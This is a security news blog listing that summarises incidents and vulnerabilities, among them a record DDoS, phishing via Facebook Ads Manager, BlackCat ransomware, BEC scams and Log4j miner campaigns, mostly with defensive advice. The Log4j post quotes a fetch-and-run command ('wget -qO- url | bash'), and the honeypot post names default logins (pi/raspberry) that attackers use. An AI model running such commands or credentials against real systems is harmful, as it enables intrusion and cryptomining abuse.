Search This Blog

Showing posts with label attackers. Show all posts

Extended DDoS Attack With 25.3B+ Requests Thwarted

 

On June 27, 2022, the cybersecurity firm Imperva mitigated a DDoS attack with over 25.3 billion requests. The attack, according to experts, sets a new record for Imperva's application DDoS mitigation solution. The attack, which targeted an unnamed Chinese telecommunications company, was notable for its duration, lasting more than four hours and peaking at 3.9 million RPS. 

“On June 27, 2022, Imperva mitigated a single attack with over 25.3 billion requests, setting a new record for Imperva’s application DDoS mitigation solution” reads the announcement. “While attacks with over one million requests per second (RPS) aren’t new, we’ve previously only seen them last for several seconds to a few minutes. On June 27, Imperva successfully mitigated a strong attack that lasted more than four hours and peaked at 3.9 million RPS.”

The Chinese telecommunications company had previously been targeted by large attacks, and experts added that two days later, a new DDoS attack hit its website, albeit for a shorter period of time. This record-breaking attack had an average rate of 1.8 million RPS. To send multiple requests over individual connections, threat actors used HTTP/2 multiplexing or combining multiple packets into one.

The attackers' technique is difficult to detect and can bring down targets with a limited number of resources.

“Since our automated mitigation solution is guaranteed to block DDoS in under three seconds, we estimate that the attack could have reached a much greater rate than our tracked peak of 3.9 million RPS.” continues Imperva.

This attack was launched by a botnet comprised of nearly 170,000 different IP addresses, including routers, security cameras, and compromised servers. The compromised devices can be found in over 180 countries, with the majority of them in the United States, Indonesia, and Brazil.

Akamai mitigated the largest DDoS attack ever against one of its European customers on Monday, September 12, 2022. The malicious traffic peaked at 704.8 Mpps and appears to be the work of the same threat actor as the previous record, which Akamai blocked in July and hit the same customer.

Attackers Abuse Facebook Ad Manager in Credential-Harvesting Campaign

 

Attackers are capitalising on the power of the Facebook brand by sending emails that appear to be from Facebook Ads Manager. The plan is to trick victims into providing their credentials and credit card information on a Facebook lead generation form. 

According to a report published on Tuesday by Avanan's security research team, attackers are sending phishing messages that seem to be urgent warnings from Meta's "Facebook AdManager" team. The messages claim that the victim is not following the company's ad policies and that the ad account will be terminated if the target does not appeal to the fictional violation. 

The "appeal form" link takes visitors to a credential-harvesting site that collects passwords and credit card information using a real Facebook lead-generation form.

An intriguing aspect of the campaign is that, rather than using a harvesting site hosted on a suspect IP somewhere, attackers are exploiting the Facebook ads system to create malicious lead-generation forms. This method kills two birds with one stone: For starters, it deceives many automated checks for malicious links used by email platforms. The Avanan team refers to using legitimate sites as the Static Expressway.

Jeremy Fuchs, cybersecurity researcher for Avanan explained in the report, "Hackers are leveraging sites that appear on static Allow Lists. That means that email security services have broadly decided that these sites are trustworthy, and thus anything related to them comes through to the inbox."

Furthermore, using Facebook Ads forms provides a high level of realism for any of Facebook's eight billion advertising users who are already familiar with the Ads Manager platform and the lead-generation forms it generates.

"For the end user, seeing that their Facebook ad account has been suspended is cause for concern," Fuchs said. "Since it’s a legitimate Facebook link, the user would feel confident continuing on."

While the sites used in this credential harvesting campaign appeared to be legitimate, Fuchs discovered a red flag in the phishing messages: These are typically sent from Outlook accounts such as pageguidelinesfacebook@outlook.com.

Furthermore, the physical address footer in the emails is incorrect. However, if users did not notice these details, they could easily be duped by this hoax. According to earlier this year's research, brand impersonations, or brandjacking, like these elevated by 274% last year as attackers continue to peddle their scams by appearing to come from trustworthy sources. Facebook is a popular platform for phishers to imitate. 

According to a Vade report released this spring, Facebook was the most impersonated brand last year, edging out perennial favourite Microsoft for the top spot. Email attacks increased by 48% in the first half of 2022, as per Abnormal Security research, with more than one in ten attacks impersonating well-known brands. So far in 2022, 256 individual brands have been impersonated, with LinkedIn and Microsoft appearing to be the favourites.

Feds, npm Issue Supply Chain Security Alert to Avoid Another SolarWinds

 

The lessons learned from the SolarWinds software supply chain attack were turned into tangible guidance this week when the United States Cybersecurity and Infrastructure Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA) released a joint best practises framework for developers to prevent future supply chain attacks.

In addition to the recommendations from the US government, developers received npm Best Practices from the Open Source Security Foundation in order to establish supply chain security open-source best practices.

"The developer holds a critical responsibility to the security of our software," the agencies said about the publication, titled Securing the Software Supply Chain for Developers. "As ESF examined the events that led up to the SolarWinds attack, it was clear that investment was needed in creating a set of best practices that focused on the needs of the software developer."

Meanwhile, OpenSSF announced that the npm code repository has grown to encompass 2.1 million packages.

Developers like Michael Burch, director of application security for Security Journey, praise the industry's proactive framework, but Burch adds that it is now up to the cybersecurity sector to put these guidelines into action, particularly a recommendation to implement software bills of materials (SBOMs).

Burch  concluded, "What we need now is the AppSec community to come together on the back of this guidance, and create a standard format and implementation for SBOMs to boost software supply chain security." 

Montenegro's State Infrastructure Struck by Cyber Attack Officials

 

An unprecedented cyber attack on Montenegro's government digital infrastructure occurred, and the government promptly implemented measures to mitigate its impact. Montenegro immediately reported the attack to other NATO members. 

“Certain services were switched off temporarily for security reasons but the security of accounts belonging to citizens and companies and their data have not been jeopardised,” said Public Administration Minister Maras Dukaj. 

The attack, according to the Minister, began on Thursday night. The US embassy in Montenegro recommended US citizens limit their movement and travel within the country to the necessities and keep their travel documents up to date and easily accessible, fearing that the attack would disrupt government infrastructure for identifying people living in Montenegro and transportation. The National Security Agency issued a warning to critical infrastructure organisations.

“A persistent and ongoing cyber-attack is in process in Montenegro,” reported the website of the U.S. Embassy in the capital Podgorica. 

“The attack may include disruptions to the public utility, transportation (including border crossings and airport), and telecommunication sectors.” 

EPCG, the state-owned power utility, has switched to manual handling to avoid any potential damage, according to Milutin Djukanovic, president of EPCG. The company decided to temporarily disable some of its clients' services as a safety measure. The government believes the attack was carried out by a nation-state actor.

“Outgoing Prime Minister Dritan Abazovic called a session of the National Security Council for Friday evening to discuss the attack. Abazovic said it was politically motivated following the fall of his government last week,” reported Reuters.

Previous Attacks

Montenegro was targeted by the Russia-linked hacker group APT28 in June 2017 after it officially joined the NATO alliance, amidst strong opposition from the Russian government, which threatened retaliation.

Montenegro experienced massive and prolonged cyberattacks against government and media websites in February 2017, for the second time in a few months. FireEye researchers who analysed the attacks discovered malware and exploits associated with the notorious Russia-linked APT group known as APT28 (aka Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit, and Tsar Team).

Another massive attack was launched against the country's institutions during the October 2016 elections, sparking speculation that the Russian Government was involved. At the time, hackers launched spear phishing attacks against Montenegro, using weaponized documents related to a NATO secretary meeting and a visit by a European army unit to the country.

The hackers distributed the GAMEFISH backdoor (also known as Sednit, Seduploader, JHUHUGIT, and Sofacy), a malware used only by the APT28 group in previous attacks. Marshal Sir Stuart Peach, Chairman of NATO's Military Committee (MC), announced the Alliance's effort to counter Russian hybrid attacks in January 2020.

The term "hybrid warfare" refers to a military strategy that combines political warfare, irregular warfare, and cyberwarfare with other methods of influencing, such as fake news, diplomacy, lawfare, and foreign electoral intervention.

'RedAlpha': This Chinese Cyberspy Group is Targeting Governments & Humanitarian Entities

 

RedAlpha, a Chinese state-sponsored cyberespionage group, has been observed targeting numerous government organisations, humanitarian organisations, and think tanks over the last three years. 

The advanced persistent threat (APT) actor, also known as Deepcliff and Red Dev 3, has been active since at least 2015, focusing on intelligence collection and surveillance of ethnic and religious minorities such as the Tibetan and Uyghur communities. 

According to cybersecurity firm Recorded Future, RedAlpha has registered hundreds of domains impersonating global government, think tank, and humanitarian organisations such as Amnesty International, the American Institute in Taiwan (AIT), the International Federation for Human Rights (FIDH), the Mercator Institute for China Studies (MERICS), and Radio Free Asia (RFA).

According to Recorded Future, the attacks are consistent with previous RedAlpha targeting of entities of interest to the Chinese Communist Party (CCP). Taiwanese organisations were also targeted, most likely for intelligence gathering. The campaign's goal has been to collect credentials from targeted individuals and organisations in order to gain access to their email and other communication accounts.

“RedAlpha’s humanitarian and human rights-linked targeting and spoofing of organizations such as Amnesty International and FIDH is particularly concerning given the CCP’s reported human rights abuses in relation to Uyghurs, Tibetans, and other ethnic and religious minority groups in China,” Recorded Future notes.

The cyberespionage group is known for using weaponized websites - which mimics well-known email service providers or specific organisations - as part of its credential-theft campaigns, but the APT registered more than 350 domains last year.

This activity was distinguished by the use of resellerclub[.]com nameservers, as well as the use of virtual private server (VPS) hosting provider Virtual Machine Solutions LLC (VirMach), overlapping WHOIS registrant information (including names, email addresses, and phone numbers), consistent domain naming conventions, and the use of specific server-side components.

About RedAlpha:

The group has recorded hundreds of domains typosquatting major email and storage service providers, including Yahoo (135 domains), Google (91 domains), and Microsoft (70), as well as domains typosquatting multiple countries' ministries of foreign affairs (MOFAs), Purdue University, Taiwan's Democratic Progressive Party, and the aforementioned and other global government, think tank, and humanitarian organisations.

The cyberespionage group registered at least 16 domains impersonating the Berlin-based non-profit organisation MERICS during the first half of 2021, which coincided with the Chinese MOFA sanctioning the think tank.

“In many cases, observed phishing pages mirrored legitimate email login portals for the specific organizations named above. We suspect that this means they were intended to target individuals directly affiliated with these organizations rather than simply imitating these organizations to target other third parties,” Recorded Future says.

RedAlpha has also shown a consistent focus on targeting Taiwanese entities over the last three years, including through multiple domains mimicking the American Institute in Taiwan (AIT), the de facto embassy of the United States of America. The hacking group was also noticed spreading its campaigns to target Brazilian, Portuguese, Taiwanese, and Vietnamese ministries of foreign affairs, as well as India's National Informatics Centre (NIC).

“We identified multiple overlaps with previous publicly reported RedAlpha campaigns that allowed us to assess this is very likely a continuation of the group’s activity. Of note, in at least 5 instances the group appeared to re-register previously owned domains after expiry,” Recorded Future notes.

The cybersecurity firm has discovered a connection between RedAlpha and a Chinese information security firm - email addresses used to register spoofing domains appear in job listings and other web pages associated with the organisation - and believes the threat actor is based in China.

“The group’s targeting closely aligns with the strategic interests of the Chinese government, such as the observed emphasis on China-focused think tanks, civil society organizations, and Taiwanese government and political entities. This targeting, coupled with the identification of likely China-based operators, indicates a likely Chinese state-nexus to RedAlpha activity,” Recorded Future concludes.

Singapore Increases its Investment in Quantum Computing, to Keep Ahead of Security Risks

 

Singapore aims to improve its quantum computing capabilities through new initiatives to build necessary skill sets and quantum equipment. It emphasises the importance of doing so in order to keep encryption technology resilient and capable of withstanding "brute force" attacks. 

The Singapore government announced on Tuesday that it will set aside SG$23.5 million (17.09 million) to support three national platforms under its Quantum Engineering Programme (QEP) for a period of up to 3.5 years. The scheme is a component of the country's Research, Innovation, and Enterprise 2020 (RIE2020) strategy. 

Two of these platforms were presented today, including the National Quantum Computing Hub, which will pool knowledge and resources from the Centre for Quantum Technologies (CQT), as well as local universities and research institutes, to strengthen key skill sets. 

Teams from CQT, the National University of Singapore, Nanyang Technological University, A*STAR's Institute of High Performance Computing (IHPC), and the National Supercomputing Centre (NSCC) would seek to establish international collaborations and train new talent in order to address a skills shortage in the emerging industry. CQT and IHPC researchers would also create quantum computing hardware and middleware, with potential applications in finance, supply chain, and chemistry. 

The National Supercomputing Center (NSCC) would offer the supercomputing capacity required to design and train algorithms for usage on quantum computers. A second initiative, National Quantum Fabless Foundry, was launched to facilitate the micro and nano-fabrication of quantum devices in cleanrooms run by industrial partners. 

The platform, which would be hosted at A*STAR's Institute of Materials Research and Engineering, would aid in the creation of products in quantum computations, communication, and sensing. Singapore's Deputy Prime Minister and Coordinating Minister for Economic Policies, Heng Swee Keat, stated in his address announcing the new efforts that the country needs to stay alert in the face of growing dangers. Heng compared cyber threats to a "cat and mouse game," saying that efforts were made to keep ahead of hostile actors who were always looking for new holes to attack. 

With the cyber world rapidly developing, he believes quantum technology has the potential to be a "game changer." "Strong encryption is key to the security of digital networks. The current encryption standard, AES 256, has held up, as few have the computing power to use brute force to break the encryption. But this could change with quantum computing," he cautioned. 

"For some cryptographic functions, the fastest quantum computer is more than 150 million times faster than the fastest supercomputer. Quantum computers can solve in minutes a problem which takes a supercomputer 10,000 years." 

This underscored the importance of quantum technology research, the minister said. "Our investment in quantum computing and quantum engineering is part of our approach of trying to anticipate the future and proactively shaping the future that we want." 

He said that as digitalisation increased, so did cyber concerns and that Singapore must continue to spend to keep ahead of possible threats. He went on to say that the fabless foundry will use the country's manufacturing skills to create quantum devices that would tackle "real-world difficulties" in collaboration with industry partners.

This Path Traversal Bug Enabled Hackers to Delete Server Files

 

Due to a security flaw in the file transfer programme CompleteFTP, unauthenticated attackers were able to delete arbitrary files on vulnerable installations. 

CompleteFTP is a proprietary FTP and SFTP server for Windows developed by EnterpriseDT of Australia that supports FTPS, SFTP, and HTTPS. A security researcher known as rgod uncovered a problem in the HttpFile class that stems from the failure to properly validate a user-supplied path before utilising it in file operations. 

A security advisory explains, “This vulnerability allows remote attackers to delete arbitrary files on affected installations of EnterpriseDT CompleteFTP server. An attacker can leverage this vulnerability to delete files in the context of SYSTEM.” 

The vulnerability was given CVE-2022-2560 and was addressed in CompleteFTP version 22.1.1. Other security changes in this release include the SHA-2 cryptographic hash algorithm for RSA signatures and a new format for PuTTY private keys.

Sharing below a brief capture of the vulnerability:
  • CVSS SCORE: 8.2, (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
  • AFFECTED VENDORS: EnterpriseDT
  • AFFECTED PRODUCTS: CompleteFTP
  • ADDITIONAL DETAILS: Fixed in version 22.1.1.

This Malware is Spreading Via Fake Cracks

 

An updated sample of the CopperStealer malware has been detected, infecting devices via websites providing fraudulent cracks for applications and other software.

Cyber attackers employ these bogus apps to perform a range of assaults. The hackers in this assault operation took advantage of the desire for cracks by releasing a phoney cracked programme that actually contained malware. 

The infection starts with a website or Telegram channel offering/presenting false cracks for downloading and installing the needed cracks. The downloaded archive files include a password-protected text file and another encrypted archive. 

The decrypted archive displays the executable files when the password specified in the text file is typed. There are two files in this sample: CopperStealer and VidarStealer. 

What are the impacts of Copper Stealer and Vidar Stealer on the systems? 

CopperStealer and Vidar stealer can cause many system infections, major privacy problems, financial losses, and identity theft. 
  • CopperStealer: The primary function of CopperStealer is to steal stored login information - usernames and passwords - as well as internet cookies from certain browsers. Mostly focuses on the login details for business-oriented Facebook and Instagram accounts. CopperStealer variants also seek login credentials for platforms and services such as Twitter, Tumblr, Apple, Amazon, Bing, and Apple. The malware can steal Facebook-related credentials from browsers such as Google Chrome, Microsoft Edge, Mozilla Firefox, Opera, and Yandex.
  • Vidar stealer: The most common ways for this malware to propagate are through pirated software and targeted phishing efforts. Vidar stealer is capable of stealing credit cards, usernames, passwords, data, and screenshots of the user's desktop. The malware steals data from a range of browsers and other system apps. It can also steal cryptocurrency wallets such as Bitcoin and Ethereum. 
Safety first

Attackers can utilise data stealers like CopperStealer to steal sensitive information for more illegal reasons. Users can stay secure by taking the following precautions: 
  • Downloading cracks from third-party websites should be avoided. 
  • Keep the systems up to date with the newest patches. 
  • It is highly advised that security detection and prevention technologies be enabled to safeguard systems from attacks.

HR Manager of Private Company Duped of ₹28 Lakh

 

The cybercrime police are looking for a person who pretended to be the managing director of a private company and duped the firm's HR manager into transferring 28.8 lakh online before fleeing. 

On Sunday, the police lodged a case against the unknown individual, accusing him of different sections of the IT Act as well as cheating and impersonation under the IPC, based on a complaint filed by Nirmal Jain, the owner of the private enterprise. 

According to Mr. Jain's allegation, the accused sent a WhatsApp message to HR manager Thirupathi Rao pretending to be Paras Jain, the company's MD. The MD's image was on the WhatsApp profile, and the message stated that it was his personal number and that he was at a meeting and should not be disturbed. 

The individual then requested that Mr. Rao move the funds to three bank accounts online on an emergency basis. Mr. Rao followed the instructions and transferred a total of 28.89,807 to the private bank account numbers specified in the communication. When he told higher officials about the transactions, the scam was discovered. 

Based on the transaction information, the authorities are now attempting to locate the accused. This is a new trend among internet fraudsters who download the profile images of senior executives of organisations in order to scam their office staff, according to experts.

BlackCat Ransomware Group Demands $5Million to Unlock Austrian State

 

The BlackCat ransomware group, also known as ALPHV, has targeted the Austrian federal state Carinthia, demanding $5 million to open encrypted computer systems. The threat actor allegedly locked thousands of workstations during the attack on Tuesday, causing serious operational interruption to government services. 

The website and email service for Carinthia are temporarily down, and the government is unable to issue new passports or traffic penalties. Furthermore, the intrusion hampered the completion of COVID-19 testing and contact tracking through the region's administrative offices. 

For $5 million, the hackers offered to deliver a functioning decryption tool. Gerd Kurath, a state spokesperson, told Euractiv that the attacker's demands will not be fulfilled. 

According to the press spokesperson, there is presently no proof that BlackCat was able to take any data from the state's systems, and the aim is to restore the workstations using accessible backups. Kurath stated that the first of the 3,000 impacted systems are likely to be operational again soon. 

At the time of writing, there is no material from Carinthia on BlackCat's data leak site, where hackers post files taken from victims who did not pay a ransom. This might imply a recent incident or that discussion with the victim are still ongoing. 

In November 2021, the ALPHV/BlackCat ransomware group emerged as one of the more advanced ransomware attacks. They are a rebranded version of the DarkSide/BlackMatter gang, which is responsible for the Colonial Pipeline attack last year. 

BlackCat affiliates launched attacks on high-profile companies and brands such as the Moncler fashion firm and the Swissport airline freight handling services provider in early 2022. 

By the completion of the first quarter of the current year, the FBI issued a warning that BlackCat had breached at least 60 businesses globally, adopting the position that it was expected to achieve as one of the most active and dangerous ransomware projects out there. 

The attack on Carinthia and the hefty ransom demands demonstrate that the threat actor targets firms that can pay substantial sums of money to get their systems decrypted and prevent additional financial losses due to lengthy operational interruption.

FBI: Business Email Compromise is a $43 Billion Scam

 

The FBI recently announced that the amount of money lost to business email compromise (BEC) scams is increasing each year, with a 65 per cent rise in identified global exposure losses between July 2019 and December 2021.

From June 2016 to July 2019, IC3 received victim complaints about 241,206 domestic and international occurrences, totalling $43,312,749,946 in exposed cash loss. 

The FBI stated, "Based on the financial data reported to the IC3 for 2021, banks located in Thailand and Hong Kong were the primary international destinations of fraudulent funds. China, which ranked in the top two destinations in previous years, ranked third in 2021 followed by Mexico and Singapore." 

This was revealed in a new public service announcement issued on the Internet Crime Complaint Center (IC3) site as an update to a prior PSA dated September 2019, in which the FBI stated victims reported losses to BEC attacks totalling more than $26 billion between June 2016 and July 2019. 

About BEC scams:

BEC scams were the cybercrime type with the highest recorded overall victim losses last year, according to the IC3 2021 Internet Crime Report [PDF]. Based on 19,954 registered complaints relating to BEC attacks against individuals and businesses in 2021, victims reported losses of about $2.4 billion. BEC scammers use a variety of techniques to infiltrate business email accounts, including social engineering, phishing, and hacking, to transfer payments to attacker-controlled bank accounts. 

Small, medium and big enterprises are frequently targeted in this form of scam (also known as EAC or Email Account Compromise). Nonetheless, if the payout is high enough, they will attack individuals. Given that they often imitate someone who has the target's trust, their success rate is also very high. 

However, "the scam is not always associated with a transfer-of-funds request," as the FBI explained in the PSA alert. "One variation involves compromising legitimate business email accounts and requesting employees' Personally Identifiable Information, Wage and Tax Statement (W-2) forms, or even cryptocurrency wallets."

The FBI also offered advice on how to protect yourself from BEC scams:
  • Use secondary channels or two-factor authentication to verify requests for changes in account information.
  • Ensure the URL in emails is associated with the business/individual it claims to be from.
  • Be alert to hyperlinks that may contain misspellings of the actual domain name.
  • Refrain from supplying log-in credentials or PII of any sort via email. Be aware that many emails requesting your personal information may appear to be legitimate.
  • Verify the email address used to send emails, especially when using a mobile or handheld device, by ensuring the sender's address appears to match who it is coming from.
  • Ensure the settings in employees' computers are enabled to allow full email extensions to be viewed.
  • Monitor your personal financial accounts on a regular basis for irregularities, such as missing deposits.

Microweber Creators Patched XSS Flaw in CMS Software

 

Microweber, an open-source website builder and content management system, has a stored cross-site scripting (XSS) vulnerability, according to security researchers. 

The security flaw, identified as CVE-2022-0930 by researchers James Yeung and Bozhidar Slaveykov, was patched in Microweber version 1.2.12. The issue developed as a result of flaws in older versions of Microweber's content filtering protections. 

Because of these flaws, attackers could upload an XSS payload as long as it contained a file ending in 'html' — a category that encompasses far more than simply plain.html files. Once this payload is uploaded, a URL with malicious HTML can be viewed and malicious JavaScript performed. 

An attacker could steal cookies before impersonating a victim, potentially the administrator of a compromised system, by controlling a script that runs in the victim's browser. A technical blog article by Yeung and Slaveykov, which includes a proof-of-concept exploit, gives additional detail about the assault. Microweber was asked to comment on the researchers' findings via a message sent through a webform on The Daily Swig's website. Microweber responded by confirming that the "issue is already fixed." 

When asked how they found Microweber as a target, Yeung told The Daily Swig, “I came across huntr.dev and found other researchers had found vulnerabilities on Microweber and that's why I joined that mania!” 

The vulnerabilities discovered in Microweber are similar to those found in other comparable enterprise software packages. The researcher explained, “I have found similar vulnerabilities in multiple CMS like Microweber, and I found that most of them are lacking user input sanitization from HTTP requests (some of which are not intended to be submitted from client).” 

To avoid issues in this area, Yeung determined that developers should gradually shift toward allow-lists and away from utilising block-lists.

Attackers UtilizingDefault Credentials to Target Businesses, Raspberry Pi and Linux Top Targets

 

While automated attacks remain a major security concern to enterprises, findings from a Bulletproof analysis highlight the challenge created by inadequate security hygiene. According to research conducted in 2021, bot traffic currently accounts for 70% of total web activity.

Default credentials are the most popular passwords used by malicious attackers, acting as a 'skeleton key' for criminal access. With attackers increasingly deploying automated attack methods 

Brian Wagner, CTO at Bulletproof stated, “On the list are the default Raspberry Pi credentials (un:pi/pwd:raspberry). There are more than 200,000 machines on the internet running the standard Raspberry Pi OS, making it a reasonable target for bad actors. We also can see what looks like credentials used on Linux machines (un:nproc/pwd:nproc). This highlights a key issue – default credentials are still not being changed.”

“Using default credentials provides one of the easiest entry points for attackers, acting as a ‘skeleton key’ for multiple hacks. Using legitimate credentials can allow attackers to avoid detection and makes investigating and monitoring attacks much harder.” 

According to the findings, attackers are continuously utilising the same typical passwords to gain access to systems. Some are default passwords that haven't been updated since the company started using them. The RockYou database leak from December 2009 is accountable for a quarter of all passwords used by attackers today. This degree of activity suggests that these passwords are still valid. 

During the period of the research, threat actors started almost 240,000 sessions. The top IP address, which came from a German server, started 915 sessions and stayed on the Bulletproof honeypot for a total of five hours. Another attacker spent 15 hours on the honeypot, successfully logging in 29 times with more than 30 different passwords. In sum, 54 per cent of the more than 5,000 distinct IP addresses had intelligence indicating they were bad actor IP addresses.

Wagner continued, “Within milliseconds of a server being put on the internet, it is already being scanned by all manner of entities. Botnets will be targeting it and a host of malicious traffic is then being driven to the server.” 

“Although some of our data shows legitimate research companies scanning the internet, the greatest proportion of traffic we encountered to our honeypot came from threat actors and compromised hosts. These insights, combined with our data, highlight the importance of proactive monitoring to ensure you are aware of the threats to your business on a daily basis, as well as a tried and tested incident response plan.”

Attackers Gained Access to the Systems of the National Games of China

 

China has recently had its own national sporting event: the National Games of China began on September 15, 2021, in the Chinese city of Shaanxi. This is a comparable event to the Olympics, however, it only features athletes from China. The National Games of the People's Republic of China, also known as the All-China Games, are China's biggest national sporting event. It is typically held every four years. 

David Álvarez, an Avast security researcher, discovered a malware sample with a peculiar file extension in early September and started to examine where it came from. Following that, he discovered a report submitted to VirusTotal by the National Games IT team on an attack against a server associated with the Games.

The data suggests that the attackers acquired initial code execution on September 3, 2021, about 10:00AM local time, and deployed their first reverse shell executing scripts called runscript.lua. Researchers believe this occurred as a result of an arbitrary file-read vulnerability targeting either route .lua which, according to the API (Application User Interface) extracted from various JavaScript files, is a LUA script containing a lot of functionality ranging from login authentication to file manipulation or index.lua in combination with index.lua?a=upload API that was not used by anyone else in the rest of the network log. It's also worth noticing that runscript.lua was not included in the report or among the files uploaded by the attacker. 

After gaining initial access, the attackers uploaded numerous other reverse shells, such as conf.lua, miss1.php, or admin2.php, to gain a more permanent foothold in the network in the event that one of the shells was found. Because these reverse shells receive commands via POST requests, the data is not contained in the logs attached to the report, which simply show the URL path. Furthermore, the logs in the report do not contain enough information about network traffic for researchers to understand how and when the attackers obtained their initial web shell. 

The method used by the attackers to hack the 14th National Games of China is not novel. They got access to the system by taking advantage of a flaw in the webserver. This highlights the importance of updating software, correctly configuring it, and being aware of potential new vulnerabilities in apps by employing vulnerability scanners.

The most essential security countermeasure for defenders is to maintain the infrastructure patched up to date (especially for the internet-facing infrastructure). The primary priority for both internal and internet-facing infrastructure should be prevention. According to the researchers, in order to fight against this type of attack, more layers of protection must be deployed so that users can identify and respond immediately when a successful breach occurs.

Telco Penalized €9 Million for Obscuring Cyberattack Impact from Customers

 

The Greek data protection authority imposed a fine on COSMOTE of 5,850,000 EUR ($6.55 million) and OTE was fined 3,250,000 EUR ($3.65 million) for exposing sensitive customer data due to a cyberattack. 

COSMOTE violated at least eight articles of the GDPR, according to the agency, including its responsibility to inform impacted customers of the full consequences of the incident. 

COSMOTE and OTE (Hellenic Telecommunications Organization) are both parts of the OTE Group, Greece's largest technological business, which provides fixed and mobile telephony, broadband, and network communication services. 

COSMOTE launched an internal investigation in 2020 and discovered that a hacker utilized LinkedIn to social engineer one of its employees and then used brute-forcing techniques to obtain the target's account credentials. According to the investigation's results, the attacker repeatedly utilized a Lithuanian IP address to access one of OTE's servers. On five consecutive occasions, the threat actor used the account credentials to extract database files and the data that was stolen and was 48GB in size. 

COSMOTE keeps call details on its servers for 90 days for service quality assurance and further 12 months for statistical analysis that aids in targeted service enhancement. The anonymization process wasn't done effectively, and the data holding periods weren't fully adhered to, as the data protection authority investigation discovered. 

The compromised server included sensitive subscriber information and call data for the dates September 1, 2020, to September 5, 2020. 

The following are some of the details that have been revealed: 
• Rough positional data of 4,792,869 unique COSMOTE subscribers. 
• Age, gender, plan, and ARPU of 4,239,213 unique COSMOTE subscribers. 
• MSISDN/CLI of 6,939,656 users of other telecommunication providers who communicated with customers of COSMOTE. 
• MSISDN, IMEI, IMSI, and connected tower position for 281,403 roaming subscribers of COSMOTE. 

In some circumstances, the above data could be utilised for highly targeted social engineering, phishing, and even extortion. Nonetheless, for targeted subscribers who may be high-interest personalities, the consequences of the hacking attack could be substantial.

Attackers Could Gain Access to User Data due to a 'Powerdir' Flaw in macOS

 

On January 11th, Microsoft disclosed a vulnerability in Apple's macOS that might let an attacker to get unauthorised access to protected user data by circumventing the operating system's Transparency, Consent, and Control (TCC) technology. On July 15, 2021, the Microsoft Security Vulnerability Research (MSVR) team disclosed its discovery to Apple's product security team. In a security update released on December 13, Apple fixed CVE-2021-30970, dubbed "Powerdir." 

TCC is an Apple subsystem that was first introduced in macOS Mountain Lion in 2012. The technology was created to assist users in configuring the privacy settings of their device's applications, such as access to the camera or microphone, or access to their calendar or iCloud account. 

Previously, apps could directly access TCC databases to see and even edit their contents. Apple made two adjustments in response to the possibility of bypass. First, Apple used System Integrity Protection (SIP) to safeguard the system-wide TCC.db, a macOS feature that prohibits illegal code execution. Second, Apple implemented a TCC policy requiring that only apps with full disk access can access the TCC.db files.

The vulnerability discovered by Microsoft would allow attackers to circumvent this feature and start an attack on a macOS device. When an app asks for access to protected user data, one of two things can happen: If the app and request type have a record in the TCC databases, a flag in the database entry indicates whether the request should be allowed or denied without the need for user intervention. If they do not have a record, the user is asked whether they want to allow or restrict access. 

Researchers discovered that it is easy to programmatically modify a target's home directory and plant a bogus TCC database, which maintains the consent history of app requests, wrote Jonathan Bar, with the Microsoft 365 Defender Research Team, in a blog post on the findings. If abused on an unpatched system, this issue might allow an attacker to launch an attack using the victim's protected personal data, according to him. 

This is the latest in a long line of TCC flaws fixed by Apple in recent years. Apple fixed CVE-2021-30713, a flaw that allowed attackers to bypass TCC protections and deliver XCSSET malware, last year. According to Jamf researchers who identified the problem, once on a machine, XCSSET used the bypass to take a screenshot of the user's desktop without requiring rights. 

Other reported vulnerabilities linked to TCC bypass in the previous year included CVE-2020-9771 and CVE-2020-9934. Apple's remedy for the latter piqued Microsoft's interest, and during their investigation, the team found an exploit that an attacker could use to change settings on any app.

Log4j Attackers Switch to Injecting Monero Miners via RMI

 

The most significant vulnerability identified recently has dominated the news over the last few days. The vulnerability, Log4Shell or LogJam and officially termed CVE-2021-44228, is an unauthenticated RCE flaw that permits total system control on systems running Log4j 2.0-beta9 through 2.14.1. 

As per BleepingComputer, some threat actors using the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI, or even merged the two in a single request, to boost their chances of success. This is a big step forward in the ongoing attack, and firms should be aware of it as they try to secure all possible channels. 

For the time being, threat actors attempting to steal resources for Monero mining have identified this trend, but others may follow suit at any time. The majority of attacks targeting the Log4j "Log4Shell" vulnerability have used the LDAP (Lightweight Directory Access Protocol) service. 

Switching to the RMI (Remote Method Invocation) API may appear counter-intuitive at first sight, given that this technique is subject to additional checks and limitations. 

However, this is not always the case, and if we consider that some JVM (Java Virtual Machine) versions may not have strict rules, RMI may be a more easy way to do RCE (remote code execution) than LDAP. Furthermore, LDAP queries have become a well-established part of the infection chain, and defenders are keeping a close eye on them. Many IDS/IPS solutions, for example, currently filter requests using JNDI and LDAP, thus RMI may be disregarded for the time being. In some cases, Juniper recognised both RMI and LDAP services in the same HTTP POST request. 

As per the source, “This code invokes a bash shell command via the JavaScript scripting engine, using the construction “$@|bash” to execute the downloaded script. During the execution of this command, the bash shell will pipe the attacker’s commands to another bash process: “wget -qO- url | bash”, which downloads and executes a shell script on the target machine."

"This obfuscated script downloads a randomly named file of the form n.png, where n is a number between 0 and 7. Despite the purported file extension, this is actually a Monero cryptominer binary compiled for x84_64 Linux targets. The full script also adds persistence via the cron subsystem."

"A different attack, also detected by Juniper Threat Labs, tries both RMI and LDAP services in the same HTTP POST request in hopes that at least one will work. The LDAP injection string is sent as part of the POST command body. An exploit string in the POST body which is unlikely to succeed given most applications do not log the post body, which can be binary or very large, but by tagging the string as “username” in the JSON body, the attackers hope to exploit applications that will treat this request as a login attempt and log the failure."

Threat actors appear to be interested in mining Monero on hacked devices and promote it as an apparently innocent activity that "ain't going to hurt anyone else." The miner is built for x86 64 Linux systems and uses the cron subsystem for persistence. Even though the majority of attacks have targeted Linux systems. 

CheckPoint states to have discovered the first Win32 program to use Log4Shell, called 'StealthLoader.' by its investigators. 

The only way to combat what has become one of the most serious vulnerabilities in recent history is to upgrade Log4j to version 2.16.0. Administrators should also keep an eye on Apache's security area for new version announcements and execute them as soon as possible.

Ransomware Attackers and their Industry Standards for Attacking

 

Ransomware attackers have been developing 'industry standards' that they will use to determine a perfect target for their assaults. 

